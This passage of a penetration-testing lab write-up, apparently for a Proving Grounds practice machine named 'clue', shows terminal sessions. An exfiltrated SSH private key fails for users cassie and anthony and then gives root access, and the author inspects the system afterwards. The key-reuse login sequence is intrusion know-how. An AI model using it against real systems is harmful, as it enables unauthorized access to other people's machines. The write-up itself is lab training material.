SSH
An SSH private key was exfiltrated.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh cassie@$IP -i ./id_rsa
cassie@192.168.220.240's password:
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh anthony@$IP -i ./id_rsa
anthony@192.168.220.240's password: The exfiltrated id_rsa key does not belong to neither of them
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh-keygen -lf id_rsa
2048 SHA256:PN6pyaVqalSAe2eLdTcog5/dsxHYnOaaDsqKw/vYRPs anthony@clue (RSA)It says that it belongs to the anthony user
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh root@$IP -i ./id_rsa
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 25 17:08:03 2025 from 192.168.45.192
root@clue:~# whoami
root
root@clue:~# hostname
clue
root@clue:~# ipconfig
-bash: ipconfig: command not found
root@clue:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:77:65 brd ff:ff:ff:ff:ff:ff
inet 192.168.220.240/24 brd 192.168.220.255 scope global ens192
valid_lft forever preferred_lft foreverIt belongs to the root account..
System Level Compromise